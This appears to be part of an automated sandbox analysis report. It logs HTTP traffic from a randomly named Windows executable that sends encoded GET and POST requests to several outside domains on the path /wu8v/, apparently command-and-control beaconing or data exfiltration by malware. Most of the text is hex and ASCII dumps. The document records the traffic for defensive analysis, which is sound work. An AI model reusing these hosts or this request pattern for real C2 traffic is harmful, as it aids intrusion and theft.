                                                                                                                    May 8, 2024 14:07:21.128315926 CEST1289INData Raw: dc 6e fd d4 e3 76 eb db d7 17 b8 dd 2b cc d6 36 30 db 09 37 66 68 94 af 2a 59 19 ba d0 d2 63 e6 6a be 1f a9 f5 eb 5e cd bf b9 85 58 35 a2 66 34 62 6e df ad 77 60 cb 94 25 2c c2 d3 b4 3c 9f bf ba d0 e1 60 29 e0 16 f7 e5 8b a8 7f f4 dd d0 a2 57 f3
                                                                                                                    Data Ascii: nv+607fh*Ycj^X5f4bnw`%,<`)W=zM38&6_BGE\_| fUk`/6!Kdl8`iBaGp'kSKo8e`/p'p,%7clUu
                                                                                                                    May 8, 2024 14:07:21.128326893 CEST1289INData Raw: 7e de 12 75 8e 41 16 a4 3a bd c7 f9 2e d1 b5 92 ee b9 54 7d 1f ae b3 59 c7 64 4e 45 37 34 23 6a 9e fa a4 e1 59 81 8d 89 b2 9c 41 95 82 ce 9f 2e a6 c1 36 2f ba ae 5b 52 34 a2 25 a3 22 19 65 51 b3 e6 2f a0 47 3b 29 6f 5d b1 da c0 bb ec f7 1e 57 00
                                                                                                                    Data Ascii: ~uA:.T}YdNE74#jYA.6/[R4%"eQ/G;)o]Wd*0Q}4!Z<K(?L`3ad=QQf^6D~R)Mg%ZnPu7Q?xt?,n{G]_B*cC/CI~
                                                                                                                    May 8, 2024 14:07:21.128341913 CEST1289INData Raw: 88 68 62 61 8c 67 09 9b 24 52 8c 6b 09 79 18 cf a3 c6 96 8a f4 64 31 53 35 e7 09 b4 6d 0c e9 b1 36 90 b4 bb c9 96 86 b4 79 4a 72 d6 f1 10 da 16 32 10 e5 80 9a 95 ae c7 a6 84 f4 58 31 52 a6 ab a6 d1 20 3d 5e 1a 72 26 7e b2 d9 20 3d 4e 92 90 89 07
                                                                                                                    Data Ascii: hbag$Rkyd1S5m6yJr2X1R =^r&~ =N^Y2O(30&J\_i;qo{M6R`|'a +y%y3+#/D=vsl.{D(\KEcMuLH8d2 'n` |dSC]}(
                                                                                                                    May 8, 2024 14:07:21.128359079 CEST1289INData Raw: ee c2 e8 c9 ec d1 d1 6c d1 da 78 54 51 ec 3d 74 5a b0 15 7f 48 2d 40 a4 2b 43 8b 10 27 66 7b 02 b4 b7 66 58 ab e6 98 9d c3 09 56 df 50 1c b9 37 d6 1e 09 42 30 04 2c 43 24 b4 cf 46 0d 68 6d fe b2 60 f7 94 2c 42 5c ac 41 d5 ef 03 b5 d9 01 82 1f 05
                                                                                                                    Data Ascii: lxTQ=tZH-@+C'f{fXVP7B0,C$Fhm`,B\A'h^JI}L,X(<$Iu5p$4D+-dc_n#Xc[DI4=<=Y=<DF=kQ$345d6)Jcw,)tEzwim{C!tD&#m
                                                                                                                    May 8, 2024 14:07:21.128370047 CEST942INData Raw: 0a 43 f9 b7 b9 de c9 7e d5 10 c9 52 b1 38 89 37 af e6 bc 58 b2 66 99 eb c2 6a a6 25 48 c2 38 cb 44 46 33 af 16 d9 69 ab 1c 6b 26 3f 95 02 47 eb 5e 1d bb 12 b2 7b 8a 80 0b 8b d9 b3 e7 3a 23 d9 c6 e2 56 4f 39 a2 b0 7f 58 30 11 bd 90 cb 06 6a 9d 5b
                                                                                                                    Data Ascii: C~R87Xfj%H8DF3ik&?G^{:#VO9X0j[iN3OUq33|?xA@]s//F&lIF8!50BL0Z.Edp czuS`#";m'<@||`c


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    28192.168.2.44977135.213.232.35802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:07:23.486190081 CEST459OUTGET /wu8v/?MdtlcTm=G9rRy2qYQIDZeyI4LJY6JNX1SXnAoDrMeesi9cL1NNtjWs0X9VQENpz2e8f5yOztQaquY8UP2JEf8lkZo3Uj0uY+2wpGE8iKQtZfEVhbpqTk/gf9HUsxLCg=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.getgoodscrub.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    May 8, 2024 14:07:24.013814926 CEST686INHTTP/1.1 301 Moved Permanently
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:07:23 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    X-Cache-Enabled: True
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    X-Redirect-By: WordPress
                                                                                                                    Location: http://getgoodscrub.com/wu8v/?MdtlcTm=G9rRy2qYQIDZeyI4LJY6JNX1SXnAoDrMeesi9cL1NNtjWs0X9VQENpz2e8f5yOztQaquY8UP2JEf8lkZo3Uj0uY+2wpGE8iKQtZfEVhbpqTk/gf9HUsxLCg=&_X=ClAdyH4P7rA8z
                                                                                                                    X-Httpd-Modphp: 1
                                                                                                                    Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
                                                                                                                    X-Proxy-Cache: MISS
                                                                                                                    X-Proxy-Cache-Info: 0301 NC:000000 UP:


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    29192.168.2.44977247.76.62.167802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:07:29.883814096 CEST727OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.xn--yzyp76d.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.xn--yzyp76d.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.xn--yzyp76d.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 34 50 46 62 41 59 2f 75 67 55 4b 4e 76 52 6d 73 52 4e 49 70 77 39 4c 47 45 75 65 43 35 4e 31 47 62 76 47 31 70 38 2f 61 46 72 64 52 41 52 58 64 42 56 64 2b 61 79 4d 57 59 32 7a 48 55 6a 56 69 31 75 6b 6d 37 58 45 4f 77 36 51 4f 45 79 75 72 4a 39 43 76 49 64 44 5a 33 33 4d 37 6d 6e 70 64 41 44 73 4f 73 41 73 46 55 35 70 6a 72 56 39 2b 51 34 4b 72 6f 68 67 6d 31 6d 30 2b 76 68 74 55 32 32 2f 4e 55 41 73 6d 4e 68 45 38 53 4f 39 6a 53 58 30 66 4d 6e 6c 6a 49 57 30 32 48 5a 55 30 6f 4e 6d 36 74 34 53 45 41 56 57 4d 61 53 69 39 63 46 6b 5a 6f 78 70 73 7a 5a 64 77 4c 46 53 77 43 41 3d 3d
                                                                                                                    Data Ascii: MdtlcTm=4PFbAY/ugUKNvRmsRNIpw9LGEueC5N1GbvG1p8/aFrdRARXdBVd+ayMWY2zHUjVi1ukm7XEOw6QOEyurJ9CvIdDZ33M7mnpdADsOsAsFU5pjrV9+Q4Krohgm1m0+vhtU22/NUAsmNhE8SO9jSX0fMnljIW02HZU0oNm6t4SEAVWMaSi9cFkZoxpszZdwLFSwCA==
                                                                                                                    May 8, 2024 14:07:30.212421894 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:07:30 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 36 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 57 5b 6f 13 47 14 7e cf af 18 a6 a2 31 88 dd 75 12 12 8a 6f 02 42 a4 46 02 8a 50 aa b6 4f 68 bc 3b b6 87 ec ee 2c bb e3 1b 15 52 05 88 40 cb 25 a8 d0 02 a9 84 40 69 41 aa 6a 52 55 e5 92 90 20 f5 b7 64 6d e7 89 bf d0 33 3b 6b 7b 9d 4b 85 54 09 e1 99 d9 39 b7 ef 7c e7 9c 49 6e df c9 2f a6 e7 be 39 3b 83 2a c2 b1 d1 d9 2f 4f 9c 9a 9d 46 58 33 8c af 26 a6 0d e3 e4 dc 49 f4 f5 e7 73 a7 4f a1 31 3d 8d e6 7c e2 06 4c 30 ee 12 db 30 66 ce 60 84 2b 42 78 19 c3 a8 d7 eb 7a 7d 42 e7 7e d9 98 3b 67 34 a4 ae 31 29 1c 2f 35 91 90 d4 2d 61 e1 c2 48 2e 32 d8 70 6c 37 c8 ef a2 66 ec e8 d1 a3 4a 3a ba 4b 89 05 3f 0e 15 04 1c 15 9e 46 2f 56 59 2d 8f a7 b9 2b a8 2b b4 b9 a6 47 31 32 d5 2e 8f 05 6d 08 43 ea cf 22 b3 42 fc 80 8a 7c 55 94 b4 cf 30 32 7a 5a 5c e2 d0 3c ae 31 5a f7 b8 2f 12 b2 75 66 89 4a de a2 35 66 52 2d da 48 07 04 13 36 2d 6c 3d 78 df 59 5a d2 4d ee e4 0c 75 32 82 10 ca d9 cc 9d 47 3e b5 f3 38 10 4d 9b 06 15 4a 41 63 c5 a7 a5 a1 c8 1c e2 cf 07 0e b3 a9 54 [TRUNCATED]
                                                                                                                    Data Ascii: 66dW[oG~1uoBFPOh;,R@%@iAjRU dm3;k{KT9|In/9;*/OFX3&IsO1=|L00f`+Bxz}B~;g41)/5-aH.2pl7fJ:K?F/VY-++G12.mC"B|U02zZ\<1Z/ufJ5fR-H6-l=xYZMu2G>8MJAcT`2l|$A2Pjb5dp7\ pnSV1/C|&<.SFoQ/1R1tz?MYb*8F%h(6=Ap*hVp/$\62h,2@8bV[\E2BXZJw;4w;}6lH+ylQ8bn<b{/S!pvNizf8E1e:258@EgeH4#^#+kl%}%0y"p^PUaYuzXAEKj/yA.bG>}:\^hBAE&cNA=uDG.RSi:j%"8IK4vxj(6)q.e@'2'rnprA+WSqeu"GfdG)%x&] GRUwOM5h<=>vG95}R'v%j{'eg4&iNFiVo"rHW_'Eb}^ [TRUNCATED]
                                                                                                                    May 8, 2024 14:07:30.212436914 CEST580INData Raw: 5c 1e 41 23 db a3 92 b3 42 45 b6 ad 9a 23 85 8a 54 d0 fc 61 46 28 7d 0e 69 a8 69 29 6b da a5 83 c3 5e 64 ea f4 f2 c8 31 87 5a 8c 20 ee da 4d 14 98 3e a5 2e 22 ae 85 52 09 05 53 69 68 13 07 62 f3 bb 38 a6 fc 92 7e c4 38 4e 48 01 65 52 9e f6 4c 26
                                                                                                                    Data Ascii: \A#BE#TaF(}ii)k^d1Z M>."RSihb8~8NHeRL&/C,._1j4r5f*O1AFZj;0s/y63k\ 5aV}jf\hZ~)7PO$NKjUFgy}#\~.<:7


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    30192.168.2.44977347.76.62.167802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:07:32.736361980 CEST747OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.xn--yzyp76d.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.xn--yzyp76d.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.xn--yzyp76d.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 34 50 46 62 41 59 2f 75 67 55 4b 4e 75 79 2b 73 55 75 67 70 68 4e 4c 46 4c 4f 65 43 33 74 30 4e 62 76 4b 31 70 2b 54 4b 45 64 4e 52 42 30 7a 64 41 52 42 2b 66 79 4d 57 66 47 7a 43 4c 7a 56 31 31 75 59 49 37 56 51 4f 77 36 45 4f 45 33 4b 72 4a 4f 36 73 49 4e 44 58 38 58 4d 35 72 48 70 64 41 44 73 4f 73 41 52 4e 55 35 78 6a 71 6c 74 2b 51 63 65 73 72 68 67 68 79 6d 30 2b 72 68 74 51 32 32 2f 37 55 42 68 44 4e 6a 4d 38 53 4c 42 6a 63 6c 51 63 58 33 6c 70 48 32 31 79 47 70 35 64 69 63 75 32 76 72 79 54 50 47 37 75 62 55 7a 6e 4e 30 46 4f 36 78 4e 66 75 65 55 45 47 47 76 35 5a 41 45 69 30 46 67 6b 64 65 67 50 75 77 6f 30 33 4e 75 5a 73 54 73 3d
                                                                                                                    Data Ascii: MdtlcTm=4PFbAY/ugUKNuy+sUugphNLFLOeC3t0NbvK1p+TKEdNRB0zdARB+fyMWfGzCLzV11uYI7VQOw6EOE3KrJO6sINDX8XM5rHpdADsOsARNU5xjqlt+Qcesrhghym0+rhtQ22/7UBhDNjM8SLBjclQcX3lpH21yGp5dicu2vryTPG7ubUznN0FO6xNfueUEGGv5ZAEi0FgkdegPuwo03NuZsTs=
                                                                                                                    May 8, 2024 14:07:33.058872938 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:07:32 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 36 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 57 5b 6f 13 47 14 7e cf af 18 a6 a2 31 88 dd 75 12 12 8a 6f 02 42 a4 46 02 8a 50 aa b6 4f 68 bc 3b b6 87 ec ee 2c bb e3 1b 15 52 05 88 40 cb 25 a8 d0 02 a9 84 40 69 41 aa 6a 52 55 e5 92 90 20 f5 b7 64 6d e7 89 bf d0 33 3b 6b 7b 9d 4b 85 54 09 e1 99 d9 39 b7 ef 7c e7 9c 49 6e df c9 2f a6 e7 be 39 3b 83 2a c2 b1 d1 d9 2f 4f 9c 9a 9d 46 58 33 8c af 26 a6 0d e3 e4 dc 49 f4 f5 e7 73 a7 4f a1 31 3d 8d e6 7c e2 06 4c 30 ee 12 db 30 66 ce 60 84 2b 42 78 19 c3 a8 d7 eb 7a 7d 42 e7 7e d9 98 3b 67 34 a4 ae 31 29 1c 2f 35 91 90 d4 2d 61 e1 c2 48 2e 32 d8 70 6c 37 c8 ef a2 66 ec e8 d1 a3 4a 3a ba 4b 89 05 3f 0e 15 04 1c 15 9e 46 2f 56 59 2d 8f a7 b9 2b a8 2b b4 b9 a6 47 31 32 d5 2e 8f 05 6d 08 43 ea cf 22 b3 42 fc 80 8a 7c 55 94 b4 cf 30 32 7a 5a 5c e2 d0 3c ae 31 5a f7 b8 2f 12 b2 75 66 89 4a de a2 35 66 52 2d da 48 07 04 13 36 2d 6c 3d 78 df 59 5a d2 4d ee e4 0c 75 32 82 10 ca d9 cc 9d 47 3e b5 f3 38 10 4d 9b 06 15 4a 41 63 c5 a7 a5 a1 c8 1c e2 cf 07 0e b3 a9 54 [TRUNCATED]
                                                                                                                    Data Ascii: 66dW[oG~1uoBFPOh;,R@%@iAjRU dm3;k{KT9|In/9;*/OFX3&IsO1=|L00f`+Bxz}B~;g41)/5-aH.2pl7fJ:K?F/VY-++G12.mC"B|U02zZ\<1Z/ufJ5fR-H6-l=xYZMu2G>8MJAcT`2l|$A2Pjb5dp7\ pnSV1/C|&<.SFoQ/1R1tz?MYb*8F%h(6=Ap*hVp/$\62h,2@8bV[\E2BXZJw;4w;}6lH+ylQ8bn<b{/S!pvNizf8E1e:258@EgeH4#^#+kl%}%0y"p^PUaYuzXAEKj/yA.bG>}:\^hBAE&cNA=uDG.RSi:j%"8IK4vxj(6)q.e@'2'rnprA+WSqeu"GfdG)%x&] GRUwOM5h<=>vG95}R'v%j{'eg4&iNFiVo"rHW_'Eb}^ [TRUNCATED]
                                                                                                                    May 8, 2024 14:07:33.058887959 CEST580INData Raw: 5c 1e 41 23 db a3 92 b3 42 45 b6 ad 9a 23 85 8a 54 d0 fc 61 46 28 7d 0e 69 a8 69 29 6b da a5 83 c3 5e 64 ea f4 f2 c8 31 87 5a 8c 20 ee da 4d 14 98 3e a5 2e 22 ae 85 52 09 05 53 69 68 13 07 62 f3 bb 38 a6 fc 92 7e c4 38 4e 48 01 65 52 9e f6 4c 26
                                                                                                                    Data Ascii: \A#BE#TaF(}ii)k^d1Z M>."RSihb8~8NHeRL&/C,._1j4r5f*O1AFZj;0s/y63k\ 5aV}jf\hZ~)7PO$NKjUFgy}#\~.<:7


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    31192.168.2.44977447.76.62.167802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:07:35.579751015 CEST10829OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.xn--yzyp76d.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.xn--yzyp76d.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.xn--yzyp76d.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 34 50 46 62 41 59 2f 75 67 55 4b 4e 75 79 2b 73 55 75 67 70 68 4e 4c 46 4c 4f 65 43 33 74 30 4e 62 76 4b 31 70 2b 54 4b 45 64 46 52 42 43 76 64 42 77 42 2b 59 79 4d 57 63 47 7a 44 4c 7a 56 30 31 75 41 45 37 56 63 30 77 34 38 4f 47 52 57 72 41 66 36 73 43 4e 44 58 7a 33 4d 36 6d 6e 6f 46 41 44 38 4b 73 41 68 4e 55 35 78 6a 71 6d 46 2b 5a 6f 4b 73 6e 42 67 6d 31 6d 31 73 76 68 74 6f 32 79 62 72 55 42 31 35 4e 79 73 38 54 72 78 6a 51 33 49 63 62 33 6c 6e 45 32 31 55 47 70 31 47 69 59 48 46 76 71 57 31 50 46 6e 75 62 6a 53 6b 66 46 78 42 34 78 6c 38 30 66 38 62 43 45 32 67 65 47 6b 2b 36 58 4d 67 42 76 41 58 74 77 4a 78 6e 38 48 66 2f 47 4e 31 69 39 64 6f 78 6c 68 67 36 6a 67 68 33 39 56 69 4b 36 43 75 39 47 38 6a 54 38 4a 4f 6f 6e 62 4c 72 32 72 43 6c 33 58 4e 43 42 62 34 2b 75 2f 4a 54 77 7a 75 74 48 48 54 42 2f 4e 65 6b 4e 56 67 62 6c 38 76 52 47 35 56 6e 4b 46 48 45 44 76 63 32 48 69 57 2b 50 43 56 4b 37 73 42 75 52 4b 72 57 44 68 5a 36 6e 69 43 52 35 31 4a 76 39 53 79 58 6b [TRUNCATED]
                                                                                                                    Data Ascii: MdtlcTm=4PFbAY/ugUKNuy+sUugphNLFLOeC3t0NbvK1p+TKEdFRBCvdBwB+YyMWcGzDLzV01uAE7Vc0w48OGRWrAf6sCNDXz3M6mnoFAD8KsAhNU5xjqmF+ZoKsnBgm1m1svhto2ybrUB15Nys8TrxjQ3Icb3lnE21UGp1GiYHFvqW1PFnubjSkfFxB4xl80f8bCE2geGk+6XMgBvAXtwJxn8Hf/GN1i9doxlhg6jgh39ViK6Cu9G8jT8JOonbLr2rCl3XNCBb4+u/JTwzutHHTB/NekNVgbl8vRG5VnKFHEDvc2HiW+PCVK7sBuRKrWDhZ6niCR51Jv9SyXkjt9yFaEJB19PMX3ggE21UgdLef+UIYwwu76PLv96y+zTYxQdei9WtGFrpszuI/BlqR82rxIOV3uZVl7e+CAqOLOp2+Ah1V7+vgXpLcN/FBM5HKvm6gcMmPGVnfmWwgGbUHu6bNDCRMXfOfsZsqIs96jkKIRnYyAJUacIdbAU7MMjvcwiFRuMALBiXr9tFm9TGdo3EKbDYVKdNU8RUbvmlJ75LKoZFPBRgcah8lSgWJe+IWA5JxpO/dTY7ujUwPQC4yCifTcpkSl2GD4FKjfzYdp8Vzv/+Ka0h6NwxceqpcfXY9AvNo+c+SZWvtdOoa4Vcr3wDFYEZgFvmXcKajsPFCF9XSJy2buWR74dd9DIckONbUutXutqRfWCMUJA2mhMsT3NXZxUTCeQ9NlwlH0tck6KKVm0hHBAfRK2Tz2Zp57hgZj0mOps8NRIjcvASQxX5ZIbinOjWjhzVvrXecayvMyZPBVtaQU/DaBO+GuCAJQD4TSitWp9aGcT17MFL00yzoJaxWDytcep7G8+bDlVPe+NvdhvAqwVRKWQR/K5VvnzRzf2bmbWv0bO78pH6MTzZNyGqsUDEfpbFT/YsQ5/iwrWDH26Z2pSu5MrQBJW2bbRTFdu+GAogFCM8tYHUCYjEFVtsW5SOaAtiQGdIhwOCWMlXQBM9svxbZ [TRUNCATED]
                                                                                                                    May 8, 2024 14:07:35.900353909 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:07:35 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 36 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 57 5b 6f 13 47 14 7e cf af 18 a6 a2 31 88 dd 75 12 12 8a 6f 02 42 a4 46 02 8a 50 aa b6 4f 68 bc 3b b6 87 ec ee 2c bb e3 1b 15 52 05 88 40 cb 25 a8 d0 02 a9 84 40 69 41 aa 6a 52 55 e5 92 90 20 f5 b7 64 6d e7 89 bf d0 33 3b 6b 7b 9d 4b 85 54 09 e1 99 d9 39 b7 ef 7c e7 9c 49 6e df c9 2f a6 e7 be 39 3b 83 2a c2 b1 d1 d9 2f 4f 9c 9a 9d 46 58 33 8c af 26 a6 0d e3 e4 dc 49 f4 f5 e7 73 a7 4f a1 31 3d 8d e6 7c e2 06 4c 30 ee 12 db 30 66 ce 60 84 2b 42 78 19 c3 a8 d7 eb 7a 7d 42 e7 7e d9 98 3b 67 34 a4 ae 31 29 1c 2f 35 91 90 d4 2d 61 e1 c2 48 2e 32 d8 70 6c 37 c8 ef a2 66 ec e8 d1 a3 4a 3a ba 4b 89 05 3f 0e 15 04 1c 15 9e 46 2f 56 59 2d 8f a7 b9 2b a8 2b b4 b9 a6 47 31 32 d5 2e 8f 05 6d 08 43 ea cf 22 b3 42 fc 80 8a 7c 55 94 b4 cf 30 32 7a 5a 5c e2 d0 3c ae 31 5a f7 b8 2f 12 b2 75 66 89 4a de a2 35 66 52 2d da 48 07 04 13 36 2d 6c 3d 78 df 59 5a d2 4d ee e4 0c 75 32 82 10 ca d9 cc 9d 47 3e b5 f3 38 10 4d 9b 06 15 4a 41 63 c5 a7 a5 a1 c8 1c e2 cf 07 0e b3 a9 54 [TRUNCATED]
                                                                                                                    Data Ascii: 66dW[oG~1uoBFPOh;,R@%@iAjRU dm3;k{KT9|In/9;*/OFX3&IsO1=|L00f`+Bxz}B~;g41)/5-aH.2pl7fJ:K?F/VY-++G12.mC"B|U02zZ\<1Z/ufJ5fR-H6-l=xYZMu2G>8MJAcT`2l|$A2Pjb5dp7\ pnSV1/C|&<.SFoQ/1R1tz?MYb*8F%h(6=Ap*hVp/$\62h,2@8bV[\E2BXZJw;4w;}6lH+ylQ8bn<b{/S!pvNizf8E1e:258@EgeH4#^#+kl%}%0y"p^PUaYuzXAEKj/yA.bG>}:\^hBAE&cNA=uDG.RSi:j%"8IK4vxj(6)q.e@'2'rnprA+WSqeu"GfdG)%x&] GRUwOM5h<=>vG95}R'v%j{'eg4&iNFiVo"rHW_'Eb}^ [TRUNCATED]
                                                                                                                    May 8, 2024 14:07:35.900382042 CEST580INData Raw: 5c 1e 41 23 db a3 92 b3 42 45 b6 ad 9a 23 85 8a 54 d0 fc 61 46 28 7d 0e 69 a8 69 29 6b da a5 83 c3 5e 64 ea f4 f2 c8 31 87 5a 8c 20 ee da 4d 14 98 3e a5 2e 22 ae 85 52 09 05 53 69 68 13 07 62 f3 bb 38 a6 fc 92 7e c4 38 4e 48 01 65 52 9e f6 4c 26
                                                                                                                    Data Ascii: \A#BE#TaF(}ii)k^d1Z M>."RSihb8~8NHeRL&/C,._1j4r5f*O1AFZj;0s/y63k\ 5aV}jf\hZ~)7PO$NKjUFgy}#\~.<:7


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    32192.168.2.44977547.76.62.167802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:07:38.447269917 CEST458OUTGET /wu8v/?MdtlcTm=1Nt7DtzRhGe3jz/JXOJL2dnBH6uFnvwsc8PmoPLhBuJURU+BFCU8Z1cZNkrKfh5y7OIVqmEx6Y55MHCBN9ekEPrBm2pelHdYOjg1gnpKSYR8wHJ7U/KLji4=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.xn--yzyp76d.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    May 8, 2024 14:07:38.781186104 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:07:38 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Data Raw: 64 34 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 3c 74 69 74 6c 65 3e e9 95 bf e7 9b 9b 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 20 20 